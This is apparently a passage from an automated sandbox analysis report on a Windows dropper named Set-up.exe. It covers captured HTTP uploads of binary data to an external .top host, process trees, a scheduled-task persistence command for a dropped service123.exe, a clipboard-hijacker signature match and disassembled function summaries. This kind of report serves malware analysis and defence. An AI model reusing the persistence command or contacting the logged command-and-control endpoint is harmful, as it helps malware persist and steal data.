Oct 4, 2024 14:44:28.066597939 CEST	2472	OUT	Data Raw: a9 ec e2 aa c1 48 7b c8 8b d0 b7 b7 08 aa a8 9f 8a f4 bf 53 e5 0e 3d 2f 8d d8 2d 87 d9 e4 96 34 9c de 5f b1 3c 23 fe 54 1d 33 1d 83 1d 4f 44 72 ce 7e 62 06 bb 00 d7 06 95 75 dc 60 95 d7 0c 47 d1 6f 90 d1 a4 84 40 10 fc 8b 21 16 6b 61 8a b0 cb de Data Ascii: H{S=/-4_<#T3ODr~bu`Go@!kaMVjat\-xIElT_I=v8gdG16lXla:9M`gFPg=")0/,Gft?X{+Y"O~W9"GF``Rj#]K"0HRkJv
Oct 4, 2024 14:44:28.066617012 CEST	2472	OUT	Data Raw: f1 d6 dc de f0 43 e9 f8 cc 48 94 d1 2c 29 bd ec ed da 0e 00 16 0b 5d 82 50 9d df ab 9f cb d2 68 a2 e7 d5 fe 59 7c 11 f4 6c d3 5d 13 17 59 7d 80 30 ad d5 c3 77 f4 82 47 3d c7 a3 ad d4 5b 59 09 c4 00 59 6a 7f d4 7e 7b 07 2c d5 ac eb d5 f5 a3 29 2c Data Ascii: CH,)]PhY\|l]Y}0wG=[YYj~{,),zjp<D$?-]L*9R&4i71}wFp+'i!C<G#^NxMeg,7q& 7c>C`{OXZ.lN+m"X(`A[wZXM
Oct 4, 2024 14:44:28.066654921 CEST	2472	OUT	Data Raw: dc 80 88 d0 05 24 87 af a1 a7 7d 05 e2 9a 1e 9d 4a aa 78 2a 55 fc 5b 39 b1 2a 23 e3 b9 13 c5 26 28 52 8b 02 95 05 4b 2b 96 c6 07 4d 8d 0a 58 f7 87 90 a4 e0 31 0e 95 a7 8c 11 1d 37 0f a5 3f 50 b3 33 23 26 91 84 ff 81 7a a1 12 7b 3e 12 31 18 a3 ff Data Ascii: $}JxU[9#&(RK+MX17?P3#&z{>1kjr6AJh?v#X_Vcqm\Kk=?l-FJzFZ\$>O!SF#\|eG>(\KzwsnR}FpHd!y7a[
Oct 4, 2024 14:44:28.066673994 CEST	2472	OUT	Data Raw: 47 d6 1b da 72 cc f2 8d fa 6a 84 71 33 bd 77 1d 5b 95 b7 22 76 4d bc 75 9b 57 2b d3 1c eb d6 0f 73 e8 d7 56 4d 9c d9 6c f6 a7 8d ee 61 df 45 ab 00 2c d6 8c f9 2f c8 94 f3 5d 6a 20 6e fb 29 4e be 55 2e c4 f8 71 be 2d e2 e0 34 b3 f7 4b 4b 5d d1 6d Data Ascii: Grjq3w["vMuW+sVMlaE,/]j n)NU.q-4KK]m7F"<ABQ:"' :YZ;^X/Yb0q'NtVbDCYhc69YA:432_6=b\>n~E8/$n1&*N,(f4K
Oct 4, 2024 14:44:28.066730022 CEST	2472	OUT	Data Raw: 28 59 80 96 5a 73 f5 1d 04 56 5d 46 63 28 0c 4b ba ea c0 c0 1b 7a d2 53 0b 96 ba 9d 88 3c f4 62 e6 4d 91 a3 9b d1 bd 5d 01 bc c9 f8 43 88 bb fc f4 65 66 c6 80 40 45 1f 9b f9 9d bf 80 1d 41 e4 e5 83 a9 8e 84 fa 90 ae 0a 91 4d 3e f8 51 f2 51 d4 78 Data Ascii: (YZsV]Fc(KzS<bM]Cef@EAM>QQxCK1AY,iWqI"ehQ$^i;nZ_E]pnmG9)\,Sccgq~ b!A^^gXwgu9!n4E
Oct 4, 2024 14:44:28.066755056 CEST	2472	OUT	Data Raw: b8 27 58 b1 6a ba e4 99 16 f6 f9 ec d9 81 fc 8a 0d 64 df d0 f1 44 85 bc 38 07 ee ec 5c a0 11 46 bb 63 93 3a 77 ab 2e 70 22 e4 42 fc e5 64 e7 05 71 18 26 31 f1 9f 15 c9 9c 34 54 9a 65 91 1b c4 93 5e b4 5a bd 8e 44 f8 b8 d1 30 8d e6 60 5f 11 a7 7a Data Ascii: 'XjdD8\Fc:w.p"Bdq&14Te^ZD0`_z#WaDT"OlKVX<n;pu}<2x-QY\3ic@-y\s:+\M\|D3.H!Gr}<qdhZcU#4e/"AZ
Oct 4, 2024 14:44:29.003720999 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 04 Oct 2024 12:44:28 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49717	185.244.181.140	80	7444	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 14:44:32.308888912 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary31689036 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 36669 Host: sevtvx17pt.top
Oct 4, 2024 14:44:32.308989048 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 31 36 38 39 30 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 61 76 Data Ascii: ------Boundary31689036Content-Disposition: form-data; name="file"; filename="Favesafop.bin"Content-Type: application/octet-streamHT8=51&D'`ZYG;J1&2gk/OSC9"UyibW@c3bT{aqX
Oct 4, 2024 14:44:32.313997984 CEST	1236	OUT	Data Raw: 11 8a ca 8e 84 7c 4f 9c 10 bd 5b 1c 84 ec cb 16 8f 6e e0 6a 54 92 bc 6e 87 2e 0e 44 eb cf e7 49 09 9b bf 98 c0 29 6a d3 d8 cf 76 e6 c9 82 17 ba f0 c9 24 16 65 6d 36 47 45 f4 5c 18 b8 4f d6 d9 ca 12 b4 1d d8 83 cc 25 02 46 4c 76 8f fd 70 19 31 89 Data Ascii: \|O[njTn.DI)jv$em6GE\O%FLvp15JlZ9V*bt[EI:Xk.k`aAgfb O:5teK9DI`7uD}lYf+T{0zyqwj8GG?~a"SV
Oct 4, 2024 14:44:32.314121962 CEST	7416	OUT	Data Raw: e7 d1 60 66 f5 c1 3a 90 7d c5 d0 a9 88 c5 49 ec 38 34 5e ab 48 aa 60 fd 38 c5 de 35 68 8f 95 6c e5 9f 69 7c 42 54 16 64 49 f8 fd 06 ae 1e fd 49 e7 08 72 62 7e b6 ba 56 b0 3b 16 80 eb df 70 f6 29 44 bd f3 9a 44 ca 1a ee ac a4 da 10 73 48 d9 83 af Data Ascii: `f:}I84^H`85hli\|BTdIIrb~V;p)DDsHhCbnTxjkX]c-2\|c=9m/X[SDMfO>?&sM[%_ M~{o5.\|zv]Q@_K)*f<}Z
Oct 4, 2024 14:44:32.314244986 CEST	2472	OUT	Data Raw: 88 38 f2 cc 62 6b 28 4c ad 13 36 69 d7 bb cf 59 a1 c4 d1 41 ab 69 26 fa 3a ca 1b 4e 50 cd e1 eb 0b dc 58 b4 e3 88 08 9b 15 52 ab 38 a0 d8 4e d3 63 e0 7f 58 0d 72 55 84 90 f0 08 37 d5 e4 c5 45 87 1c 4e 3a b3 5d d3 cd b8 f1 58 f5 c8 bc cc 84 95 07 Data Ascii: 8bk(L6iYAi&:NPXR8NcXrU7EN:]X{C3`q^U1iXY'wrk4m>-S{xYNssq@([@W$ih9~?KQQR{aFU($r'G
Oct 4, 2024 14:44:32.314448118 CEST	4944	OUT	Data Raw: b3 f2 3b 0e c6 9c 45 e1 09 e6 2f 77 12 4e 54 55 11 63 b3 b2 f2 34 50 96 3c 6a 73 1d 67 2e e3 cd 5f 81 08 26 76 2e e0 91 c3 bd e9 50 dd a0 17 cc 39 40 3f 6e 4c 23 a7 78 7a b2 74 d0 59 c3 ec 34 fc 92 78 71 43 59 c9 ce b7 ae 8b 12 36 cf 3f 28 3e b0 Data Ascii: ;E/wNTUc4P<jsg._&v.P9@?nL#xztY4xqCY6?(>m($=T/Lw\|\R=5E7:0_Br@QZv=x#?W<>EwF{"GO&SfokV'7& 1wR7a
Oct 4, 2024 14:44:32.314487934 CEST	7416	OUT	Data Raw: ed 01 95 b0 e4 0c 8a 50 92 4a df e2 f3 d2 57 c5 3d be de a5 28 38 38 8f f2 87 45 b3 df b9 f2 24 c2 55 e1 7c 83 f9 dc c8 34 b1 a6 5e 18 b0 e8 fd 4c 4d 28 6f ad 58 b5 0f 7b 33 c9 ca 98 37 29 de 9f 16 7a 0b 12 4d ce 8a d5 a2 9d 1f ef 26 95 44 09 a2 Data Ascii: PJW=(88E$U\|4^LM(oX{37)zM&DU#0Dpx9onRcFgcq\t6M5TB{@(8S<>@1rQi-.WAVJ=N81:qxYxrInFD*')
Oct 4, 2024 14:44:32.319010019 CEST	2061	OUT	Data Raw: 34 34 96 cf 14 92 8e c8 a7 32 8e cd 9f 91 a7 ba 0b aa 48 6a b0 2f 86 33 df 6e af 6c ac c8 62 14 8f fc 1a 28 f2 cc 2d 90 9a d7 03 5e 84 98 51 53 90 a9 a8 03 b5 a1 9d c7 7b 2f 7e 5e 5b 0f 92 2a f7 e0 ba 46 d3 3e 6f dc 71 ce 60 7d 2d 31 89 5a b3 f0 Data Ascii: 442Hj/3nlb(-^QS{/~^[F>oq`}-1Zxj9Y&3P0G^ T hn%[W3UwZ]SLo`^W{v0+V8-jSWf]^5'Sv,-B!~k>^q9161C \J
Oct 4, 2024 14:44:33.276982069 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 04 Oct 2024 12:44:33 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	08:44:13
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x620000
File size:	9'988'096 bytes
MD5 hash:	78B5C3B4FB31188EE6C024FF96FF3807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2036432764.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:45:14
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x8f0000
File size:	314'617'856 bytes
MD5 hash:	D3D8BD210D50D5EB78D8C43E70738DD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:45:14
Start date:	04/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0x9b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:45:14
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:45:18
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x8f0000
File size:	314'617'856 bytes
MD5 hash:	D3D8BD210D50D5EB78D8C43E70738DD1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:46:03
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x8f0000
File size:	314'617'856 bytes
MD5 hash:	D3D8BD210D50D5EB78D8C43E70738DD1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	61.1%
Total number of Nodes:	72
Total number of Limit Nodes:	3

Executed Functions

Function 6C2914B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C2914CD
_exit.MSVCRT ref: 6C29151A
_write.MSVCRT ref: 6C29156A
_close.MSVCRT ref: 6C291579

Strings

@, xrefs: 6C364AB1
terminated, xrefs: 6C291540
CONOUT$, xrefs: 6C2914C6
,p;l, xrefs: 6C364AED

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,p;l$@$CONOUT$
API String ID: 28676597-137451005
Opcode ID: 2177a5a1b520f9f2f94bd766b9533795d40bb98d4ae8ea4935e6a118b9fd5b12
Instruction ID: cfc991f79dd90a0554f7394d132e2f392a944a2c5bbde4c3569873f9b71d9119
Opcode Fuzzy Hash: 2177a5a1b520f9f2f94bd766b9533795d40bb98d4ae8ea4935e6a118b9fd5b12
Instruction Fuzzy Hash: 504108B19083099FDB00DFBAC44466ABBF8EF49318F108A2DE8A9D7A40E335D545CF56

Function 008F116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 008F11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 008F1238
__p__acmdln.MSVCRT ref: 008F1261
malloc.MSVCRT ref: 008F12EB
strlen.MSVCRT ref: 008F1323
malloc.MSVCRT ref: 008F132E
memcpy.MSVCRT ref: 008F1344
GetStartupInfoA.KERNEL32 ref: 008F1433

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 0df5fda6b2c1e757f7084ff76b52feaef16f1432afc5e716db189c5f95427d5d
Instruction ID: 078d0ea008f911a7f76f65e4d9f50dfab265f40b16b2445450c212b14c3f881d
Opcode Fuzzy Hash: 0df5fda6b2c1e757f7084ff76b52feaef16f1432afc5e716db189c5f95427d5d
Instruction Fuzzy Hash: 1D815871A04708CBDF10DFB8D888B7ABBE2FB84304F104529DB85DB211DB75A849DB96

Function 008F15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 008F15CD
_exit.MSVCRT ref: 008F161A
_write.MSVCRT ref: 008F166A
_close.MSVCRT ref: 008F1679

Strings

@, xrefs: 008F8341
CONOUT$, xrefs: 008F15C6
terminated, xrefs: 008F1640

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: ad99fac33cae0242ed292cac1bdb2e0fa8b6f13be3027a224a03e481b5113020
Instruction ID: 2d2379a277297f7b37b98071c6689d63eb3678cd919f442c2683cbc77d24b3e7
Opcode Fuzzy Hash: ad99fac33cae0242ed292cac1bdb2e0fa8b6f13be3027a224a03e481b5113020
Instruction Fuzzy Hash: 874118B0908309CFDB009FB9C848A7EBBE4FB84714F00892DEA59D7250EB78D845CB52

Function 008F81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,008F138E,?,?,00006EA2,008F138E), ref: 008F8271
GetProcAddress.KERNEL32 ref: 008F828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,008F138E,?,?,00006EA2,008F138E), ref: 008F829D

Strings

WomwWuRzvwrFDpojwrFDpojKxBm.dll, xrefs: 008F824A
tPEKCXmgqaqaYaqMLXsZ, xrefs: 008F827E
Failed to get function address. Error code: %d, xrefs: 008F82E0

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$WomwWuRzvwrFDpojwrFDpojKxBm.dll$tPEKCXmgqaqaYaqMLXsZ
API String ID: 145871493-1476957417
Opcode ID: 4d04080533190fc197631308379a3cd918508fa1002577ed9badd43acfb6955f
Instruction ID: fef55d3ce0b8ac756ca7dc8d2ec6cfda9e57883cffbd0afa2527135162852297
Opcode Fuzzy Hash: 4d04080533190fc197631308379a3cd918508fa1002577ed9badd43acfb6955f
Instruction Fuzzy Hash: AF3190B2904608DFDB04AFB8ED4997ABBE5FB85300F104928E645C3214EF75E445CB52

Function 008F8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,008F138E,?,?,00006EA2,008F138E), ref: 008F8271
GetProcAddress.KERNEL32 ref: 008F828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,008F138E,?,?,00006EA2,008F138E), ref: 008F829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,008F138E,?,?,00006EA2,008F138E), ref: 008F82BD
GetLastError.KERNEL32 ref: 008F82DA
FreeLibrary.KERNEL32 ref: 008F82F3

Strings

WomwWuRzvwrFDpojwrFDpojKxBm.dll, xrefs: 008F824A
tPEKCXmgqaqaYaqMLXsZ, xrefs: 008F827E
Failed to load DLL. Error code: %d, xrefs: 008F82C3

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$WomwWuRzvwrFDpojwrFDpojKxBm.dll$tPEKCXmgqaqaYaqMLXsZ
API String ID: 1397630947-781431094
Opcode ID: 794f2c7e3691d17cc62dde9d4acddaec8b8ebd0da6f0f6ddd26feeb7a2a2a310
Instruction ID: 08d24d5ffeaa145d33e912c935e68e222d27409ed4a5336b5b8bca61d8dba0bc
Opcode Fuzzy Hash: 794f2c7e3691d17cc62dde9d4acddaec8b8ebd0da6f0f6ddd26feeb7a2a2a310
Instruction Fuzzy Hash: 5411E672804A08DFD704AFB8DD4557EBBA1FB45300F108A28D659C3155EF72E545CA43

Function 008F13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 008F1238
__p__acmdln.MSVCRT ref: 008F1261
malloc.MSVCRT ref: 008F12EB
strlen.MSVCRT ref: 008F1323
malloc.MSVCRT ref: 008F132E
memcpy.MSVCRT ref: 008F1344
_amsg_exit.MSVCRT ref: 008F13EA
_initterm.MSVCRT ref: 008F140C

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: 712efaf04d64348e60de23f056e33f20862c0c82b11ab5b25432d63b4f401a61
Instruction ID: e2d58217d26651d52d67d53380a1ba0268aec4d885a1a89c0a64ecba4c322f17
Opcode Fuzzy Hash: 712efaf04d64348e60de23f056e33f20862c0c82b11ab5b25432d63b4f401a61
Instruction Fuzzy Hash: B641C0B0A04B09CBDB10EFB8E888B7DBBE1FB84300F104529DB85D7211DB75A849DB56

Function 008F11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 008F11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 008F1238
__p__acmdln.MSVCRT ref: 008F1261
malloc.MSVCRT ref: 008F12EB
strlen.MSVCRT ref: 008F1323
malloc.MSVCRT ref: 008F132E
memcpy.MSVCRT ref: 008F1344
_amsg_exit.MSVCRT ref: 008F13EA
_initterm.MSVCRT ref: 008F140C

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: e61dac1c27a0e709c8b2d527fe410bc7762a3bc1bf4981ad352be30f2e0ac1a9
Instruction ID: 8d39154337ac3dd65ff3b0b41fa047323737758ceecfa1ec0bc5d855863ecffe
Opcode Fuzzy Hash: e61dac1c27a0e709c8b2d527fe410bc7762a3bc1bf4981ad352be30f2e0ac1a9
Instruction Fuzzy Hash: 9A4105B0A04709CBDB10EF79E888B3EBBE1FB84340F104529DA85DB350DB75A845CB96

Function 008F1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 008F11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 008F1238
__p__acmdln.MSVCRT ref: 008F1261
malloc.MSVCRT ref: 008F12EB
strlen.MSVCRT ref: 008F1323
malloc.MSVCRT ref: 008F132E
memcpy.MSVCRT ref: 008F1344
GetStartupInfoA.KERNEL32 ref: 008F1433

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: f5c686175e9720c6de874b1de268cdd9847f9bcecff3f55c3d765249cb5cddbe
Instruction ID: 92119ff6125dd639c6e954a1c3660fe3efd88d46f5e9cb1a36801205785d6c31
Opcode Fuzzy Hash: f5c686175e9720c6de874b1de268cdd9847f9bcecff3f55c3d765249cb5cddbe
Instruction Fuzzy Hash: 57512971A04708CFDB10DFB8D888B7ABBE1FB84304F104529DA45DB311DB75A845DB96

Function 6C364230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C364259
CreateMutexA.KERNELBASE ref: 6C3642A3
Sleep.KERNELBASE ref: 6C3642BF
GetClipboardSequenceNumber.USER32 ref: 6C3642C8

Strings

ATatfiYADbBypHtbUUTn, xrefs: 6C364242, 6C36428C

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: ATatfiYADbBypHtbUUTn
API String ID: 3689039344-4152983769
Opcode ID: 173de18104712c4133eba8fd8be08b9e3c32db912a46deabe60bb113e04c12ce
Instruction ID: ae84f1d3e2a0d14f11153bc7d949b66dbb90edc083c578dd4957596d0be44d3f
Opcode Fuzzy Hash: 173de18104712c4133eba8fd8be08b9e3c32db912a46deabe60bb113e04c12ce
Instruction Fuzzy Hash: 3001127190830A8FCB00EFA5C50975BBFF8EB96304F018818E98887644E775A048CFA6

Function 008F1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

